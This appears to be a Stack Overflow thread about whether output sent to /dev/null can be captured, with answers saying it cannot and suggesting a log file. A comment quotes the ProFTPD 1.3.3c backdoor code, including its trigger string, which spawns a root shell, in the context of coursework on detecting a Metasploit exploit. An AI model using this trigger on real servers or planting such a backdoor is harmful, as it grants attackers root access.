# Monitor the /dev/null 2>&1

Tags: linux, bash, file, system

I am wanting to read content that is being sent to /dev/null 2>&1 before its removed. I understand that /dev/null is in theory a blackhole for stdin and stdout, But is there a way to capture what is being sent to that file before its deleted?

I want to create a bash script that will monitor the file, I'm just wondering if it's possible?

```
if(content in /dev/null == this){
  printf("Activated")
}
```

Comment: If you want to see the content, don't pipe it to /dev/null.

Comment: to add to above, the purpose of /dev/null is to discard output.There is no way to work around that feature. You will have to remove the `>/dev/null 2>&1` and then use `myCmd 2>&1 | while read line ; do case 
"$line" in  this ) printf("Activated?\n") ;; * ) : #colon_skips_input ;; esac ; done` (or something like that). Good luck.

Comment: @SLaks, I'm currently trying to figure out what a piece of obfuscated malware (I haven't unpacked manually tweaked packers in years, and I was never good at it before anyhow) is writing to /dev/null as part of a malware analysis I am doing. Sometimes you can't just not pipe it to null.

Answer (score 1):

As said in the comments, once you redirect something to `/dev/null` it disappears. That's the whole point of it -- if you did care about the output, you wouldn't be blackholing it.

What you can do, however, is to redirect to a file:

```
> /path/to/logfile 2>&1
```

and then periodically remove that file once you've examined its contents.

Comment: Thank you, I am testing a few things under Metasploit and i've chosen an exploit for a piece of coursework. It's a ProFTPD 1.3.3c exploit where the code had been changed to.... 

 if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }

The metasploit scripts use /dev/null 2>&1 as an output for the payload. I just wanted a way to monitor and alert the user if the exploit has been activated.

Is there a way to monitor the FTP command channel and alert if it's became active?

Comment: @NathanK: Your reply/comment above is the basis for an interesting question. When you ask Qs here on S.O, learn to give a reasonable context for your problem (which you have now done), AND include sample inputs (or in your case commands), required output, current output and error messages (exactly, not just "it's not working"), along with comments about why you think  your current code should work. Keep it brief! Give the experts here something they can copy/paste to their system and get the same errors. I recommend that you write a new Q based on above and then delete this Q. Good luck

Comment: Sorry, one more thing, can you just modify the metaspoilt script to remove the redirection to `/dev/null`? That's the easiest place to start. Good luck.